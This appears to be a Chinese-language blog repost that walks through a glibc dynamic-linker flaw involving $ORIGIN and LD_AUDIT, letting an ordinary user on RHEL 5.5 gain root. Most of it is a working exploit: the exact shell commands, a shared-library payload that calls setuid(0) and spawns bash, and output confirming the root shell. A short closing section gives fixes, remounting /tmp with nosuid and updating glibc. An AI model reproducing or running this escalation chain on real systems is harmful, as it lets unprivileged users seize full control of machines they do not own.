linux c root权限不够,linux gcc++漏洞：普通用户获得root权限

linux gcc++漏洞：普通用户获得root权限

*本内容参考自他人博客文章*

Crushlinux 已经在RHEL5.5 32上测试过

原理：The GNU C library dynamic linker expands $ORIGIN in setuid library search path

1、创建一个普通测试用户：

[[email protected] ~]# useradd test

[[email protected] ~]# passwd test

Changing password for user test.

New UNIX password:

BAD PASSWORD: it is too short

Retype new UNIX password:

passwd: all authentication tokens updated successfully.

2、切换到这个用户：

[[email protected] ~]# su - test

[[email protected] ~]$ whoami

test

[[email protected] ~]$ useradd user1

-bash: useradd: command not found

3、开始提权

[[email protected] ~]$ mkdir /tmp/exploit

[[email protected] ~]$ ln /bin/ping /tmp/exploit/target

[[email protected] ~]$ exec 3< /tmp/exploit/target

[[email protected] ~]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target

[[email protected] ~]$ rm -rf /tmp/exploit/

[[email protected] ~]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -> /tmp/exploit/target (deleted)

[[email protected] ~]$ cat > payload.c

----------------------------------------

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

----------------------------------------

[[email protected] ~]$ cat payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

[[email protected] ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[[email protected] ~]$ ls -l /tmp/exploit

-rwxrwxr-x 1 test test 4223 08-07 17:43 /tmp/exploit

[[email protected] ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

[-M mtu discovery hint] [-S sndbuf]

[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

4、权限验证：

[[email protected] ~]# whoami

root

[[email protected] ~]# useradd user1

[[email protected] ~]# useradd user2

[[email protected] ~]# ls /home/

test user1 user2

[[email protected] ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

大家看到提权后的结果了，作为运维工程师遇到这类问题，就需要提供解决方法了！

有两种解决办法：

1、绑定目录

nosuid的原理：像/etc/passwd这种文件，本来只有root用户有权限修改，但是用户本身也可以修改自己的密码(超出它本身权限的行为)nosuid可以停止这种提升特权的办法。比如/tmp目录就有这样的权限，我们就需要对它严加控制。

mount -o bind /tmp /tmp

mount -o remount,bind,nosuid /tmp /tmp

2、更新glibc版本(红帽官方推荐)

yum -y update glibc

希望看到此文章的运维同事们能够及时的更新软件及补丁。